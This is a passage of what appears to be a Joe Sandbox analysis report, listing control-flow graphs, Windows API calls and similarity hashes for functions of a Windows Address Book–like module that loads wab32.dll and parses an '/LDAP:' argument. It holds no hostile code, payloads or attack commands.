                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: Path$AppendCloseEnvironmentExpandFileLibraryLoadOpenQueryRemoveSpecStringsValuememset
                                      • String ID: wab32res.dll
                                      • API String ID: 1705514897-2698570859
                                      • Opcode ID: 879961686ada97b6cc76717b930957f1c7010dca402500fea61a28371bad0788
                                      • Instruction ID: c357a1d56dede5b10ce72128228fcd63680066dd3416d26f5dab262450a0d7b6
                                      • Opcode Fuzzy Hash: 879961686ada97b6cc76717b930957f1c7010dca402500fea61a28371bad0788
                                      • Instruction Fuzzy Hash: 92F03A75A02228ABCB14EBB49D49AAEB7BCAB48700F5441A9F912D3141DB70DE44CB90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 236 161b83-161bc1 memset call 1628a4 239 161bc4-161bcd 236->239 239->239 240 161bcf-161bda 239->240 241 161be1-161bf3 LoadLibraryW call 1632b0 240->241 242 161bdc 240->242 242->241
                                      APIs
                                      • memset.MSVCRT ref: 00161BA8
                                        • Part of subcall function 001628A4: memset.MSVCRT ref: 001628DE
                                        • Part of subcall function 001628A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0016290A
                                        • Part of subcall function 001628A4: RegQueryValueExW.KERNELBASE(?,001611FC,00000000,?,?,?,?,00000000,00000000), ref: 0016293F
                                        • Part of subcall function 001628A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0016295F
                                        • Part of subcall function 001628A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00162997
                                      • LoadLibraryW.KERNELBASE(?,?,00000000), ref: 00161BE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: memset$CloseEnvironmentExpandLibraryLoadOpenQueryStringsValue
                                      • String ID: wab32.dll
                                      • API String ID: 2792020168-2849205143
                                      • Opcode ID: af1a0cb95a0e7da676ea02223ef35828e2fb8e25efe7893e0435d52499f03196
                                      • Instruction ID: d88c555733e39e4b50ef3e23c7f1bdaeca276d6c93cbdeb26580ae776077d60f
                                      • Opcode Fuzzy Hash: af1a0cb95a0e7da676ea02223ef35828e2fb8e25efe7893e0435d52499f03196
                                      • Instruction Fuzzy Hash: 3BF02B7580121867CF24EB68DD4E9EB77B8EF50300FA44298E81797181EB709F59CA80

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 245 1629ab-1629ca CommandLineToArgvW 246 162a15 245->246 247 1629cc-1629ea call 162a21 LocalFree 245->247 249 162a1a-162a20 246->249 247->249 251 1629ec-162a03 call 162a21 247->251 254 162a05 251->254 255 162a08-162a13 RegisterApplicationRestart 251->255 254->255 255->249
                                      APIs
                                      • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 001629C0
                                      • LocalFree.KERNEL32(00000000,?), ref: 001629DE
                                      • RegisterApplicationRestart.KERNELBASE(00161428,00000000,00000000), ref: 00162A0B
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: ApplicationArgvCommandFreeLineLocalRegisterRestart
                                      • String ID:
                                      • API String ID: 3182635576-0
                                      • Opcode ID: f164a8193fb5bf7d1de6b9b7ec48c4737f45475a362240d2316b4b218ee883e4
                                      • Instruction ID: c02a9de1abc796643debb1df7347a926e7cd1299d970ced5cccbb9d9eb5b9828
                                      • Opcode Fuzzy Hash: f164a8193fb5bf7d1de6b9b7ec48c4737f45475a362240d2316b4b218ee883e4
                                      • Instruction Fuzzy Hash: A501B132900619BBDB21CBD4CCC8BEEB7BCEB44361F240065E901E3200DBB4AE04C7A0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 257 1625d3-16265b memset * 2 CommandLineToArgvW 258 162891-1628a1 call 1632b0 257->258 259 162661-162667 257->259 260 16287d-162886 LocalFree 259->260 261 16266d-162674 259->261 260->258 263 162888-162890 260->263 264 162676-16267e 261->264 265 162683-16269e StrCmpNIW 261->265 263->258 264->260 267 1626f0-1626f9 265->267 268 1626a0-1626a7 265->268 270 162757-16275f 267->270 271 1626fb-16271c call 161a60 PathFindExtensionW 267->271 269 1626aa-1626b3 268->269 269->269 273 1626b5-1626b9 269->273 274 162761-162770 StrCmpIW 270->274 280 16271e-16272e StrCmpIW 271->280 276 162736-16273c 273->276 277 1626bb-1626bd 273->277 278 162785-1627a2 274->278 279 162772-162781 274->279 281 162877 276->281 282 1626cf-1626dd 277->282 283 1626bf-1626cd call 161b57 277->283 285 162873-162875 278->285 286 1627a8-1627b0 278->286 279->274 284 162783 279->284 287 162730-162734 280->287 288 162741-162751 280->288 281->260 282->260 292 1626e3-1626eb 282->292 283->282 284->276 285->281 290 1627c5-1627e3 call 161a60 GetFileAttributesW 286->290 291 1627b2-1627b5 286->291 287->276 287->280 288->270 301 1627e5-1627ec 290->301 302 162833-162835 290->302 295 1627b7-1627be 291->295 296 162818-162825 291->296 292->260 295->296 300 1627c0 295->300 298 162827-16282a 296->298 299 16282c-162831 296->299 298->290 299->260 300->290 303 162811-162816 301->303 304 1627ee-1627fd PathRemoveFileSpecW 301->304 305 162837-16283e 302->305 306 162840-162848 302->306 303->281 304->303 307 1627ff-16280f GetFileAttributesW 304->307 305->303 305->306 308 16284b-162854 306->308 307->302 307->303 308->308 309 162856-162871 call 162b60 308->309 309->281 309->285
                                      APIs
                                      • memset.MSVCRT ref: 0016261B
                                      • memset.MSVCRT ref: 00162633
                                      • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 0016264D
                                      • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 0016268D
                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 0016287E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: memset$ArgvCommandFreeLineLocal
                                      • String ID: /LDAP:
                                      • API String ID: 439219084-3282177907
                                      • Opcode ID: 64dc9546bf8f2fad12ce83e5b098091ac04112f5d9f13e9f68f72fe20038aca6
                                      • Instruction ID: c209feed98a226b7d965582a63ed066c9100c0401b9d97e1ab65c4df831deaef
                                      • Opcode Fuzzy Hash: 64dc9546bf8f2fad12ce83e5b098091ac04112f5d9f13e9f68f72fe20038aca6
                                      • Instruction Fuzzy Hash: F2819071A006199BCF24DF64DC88AEAB3F9EF58300F1541A9E91AD7251D770DEA0CF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 312 163675-163698 313 16369e-1636eb GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 312->313 314 16369a-16369c 312->314 316 1636f5-1636fa 313->316 317 1636ed-1636f3 313->317 314->313 315 163702-16370c 314->315 318 1636fc 316->318 317->316 317->318 318->315
                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001636A2
                                      • GetCurrentProcessId.KERNEL32 ref: 001636B1
                                      • GetCurrentThreadId.KERNEL32 ref: 001636BA
                                      • GetTickCount.KERNEL32 ref: 001636C3
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 001636D8
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                      • String ID:
                                      • API String ID: 1445889803-0
                                      • Opcode ID: 6c562e787394d3addb6adec155b0a97ed96dce4938e19f59c8504c64b2e2989c
                                      • Instruction ID: 6783adec7d000896532e9dc76c3e6c7a85d972be5c13c756a558afa69cb0f172
                                      • Opcode Fuzzy Hash: 6c562e787394d3addb6adec155b0a97ed96dce4938e19f59c8504c64b2e2989c
                                      • Instruction Fuzzy Hash: A21106B1D01219EBCB10DFB8EE4869EBBF5FF48350F914869E502E7250E7709B408B40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 319 162a7e-162a8c 320 162a95-162aa1 319->320 321 162a8e-162a90 319->321 323 162aa3 320->323 324 162aaa 320->324 322 162b5b-162b5d 321->322 325 162aa5-162aa8 323->325 326 162aac-162ab3 323->326 324->326 325->324 325->326 327 162ab7-162abb 326->327 328 162ab5 326->328 329 162b54 327->329 330 162ac1-162ac3 327->330 328->327 331 162b59-162b5a 329->331 330->329 332 162ac9-162add GetProcessHeap HeapAlloc 330->332 331->322 332->329 333 162adf-162ae3 332->333 334 162ae5-162afd memcpy 333->334 335 162b1c-162b22 333->335 336 162aff-162b06 334->336 337 162b0b-162b0f 334->337 338 162b24-162b2b 335->338 339 162b2d-162b31 335->339 336->336 340 162b08 336->340 337->339 341 162b11-162b18 337->341 338->338 338->339 342 162b44-162b52 339->342 343 162b33-162b3e GetProcessHeap HeapFree 339->343 340->337 341->341 344 162b1a 341->344 342->331 343->342 344->339
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000000,0016286D,?,00162BA4,?,?,8000FFFF,00000000,?,?,?,0016286D,?), ref: 00162ACC
                                      • HeapAlloc.KERNEL32(00000000,?,00162BA4,?,?,8000FFFF,00000000,?,?,?,0016286D,?,?), ref: 00162AD3
                                      • memcpy.MSVCRT ref: 00162AEB
                                      • GetProcessHeap.KERNEL32(00000000,?,?,00162BA4,?,?,8000FFFF,00000000,?,?,?,0016286D,?,?), ref: 00162B37
                                      • HeapFree.KERNEL32(00000000,?,00162BA4,?,?,8000FFFF,00000000,?,?,?,0016286D,?,?), ref: 00162B3E
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocFreememcpy
                                      • String ID:
                                      • API String ID: 3405790324-0
                                      • Opcode ID: 0ec0cc4ee958c7f03bc516714202c3ef941085c8393e953332b117d957a6bde5
                                      • Instruction ID: cea192d60600489046e6b00e0615ce0f1d85fb365a75a6e91591e6440a52d0b1
                                      • Opcode Fuzzy Hash: 0ec0cc4ee958c7f03bc516714202c3ef941085c8393e953332b117d957a6bde5
                                      • Instruction Fuzzy Hash: 34212471A01E12AFDB255E6CDD88B25FBA9FF05314F108229E925DB690DBB0DC70C790

                                      Control-flow Graph

                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001633F6,00161000), ref: 001632C7
                                      • UnhandledExceptionFilter.KERNEL32(001633F6,?,001633F6,00161000), ref: 001632D0
                                      • GetCurrentProcess.KERNEL32(C0000409,?,001633F6,00161000), ref: 001632DB
                                      • TerminateProcess.KERNEL32(00000000,?,001633F6,00161000), ref: 001632E2
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                      • String ID:
                                      • API String ID: 3231755760-0
                                      • Opcode ID: c1bef46ad96e6dd7e2d395e88da40c7927d956bfb5c03cb513f8e32b6f9216e2
                                      • Instruction ID: 4657cca6c36f10ae9f441d3ea47cbaad6a69d2d1742061a8e8b2d003e2682ce1
                                      • Opcode Fuzzy Hash: c1bef46ad96e6dd7e2d395e88da40c7927d956bfb5c03cb513f8e32b6f9216e2
                                      • Instruction Fuzzy Hash: C9D0E972044504BFDF002BE1ED0DE593E3AFB44756F455410F71DC6865DAB1D4918BA5

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 001634D8: GetModuleHandleW.KERNEL32(00000000), ref: 001634DF
                                      • __set_app_type.MSVCRT ref: 00162F92
                                      • __p__fmode.MSVCRT ref: 00162FA8
                                      • __p__commode.MSVCRT ref: 00162FB6
                                      • __setusermatherr.MSVCRT ref: 00162FD7
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                      • String ID:
                                      • API String ID: 1632413811-0
                                      • Opcode ID: a5a505fccc9b6e5f0e8ac554cab4e391f5092c5b3e42d9f918dedda9b3f549e4
                                      • Instruction ID: 41c1fa535a3678603b0bdd28d7a444e085b1d5c5cd7c18fd0134448e05228b76
                                      • Opcode Fuzzy Hash: a5a505fccc9b6e5f0e8ac554cab4e391f5092c5b3e42d9f918dedda9b3f549e4
                                      • Instruction Fuzzy Hash: CEF0F2B19047109FC318AB34AD0A2187BA1BB25321B11461AF97286BE1DFB581E0CA10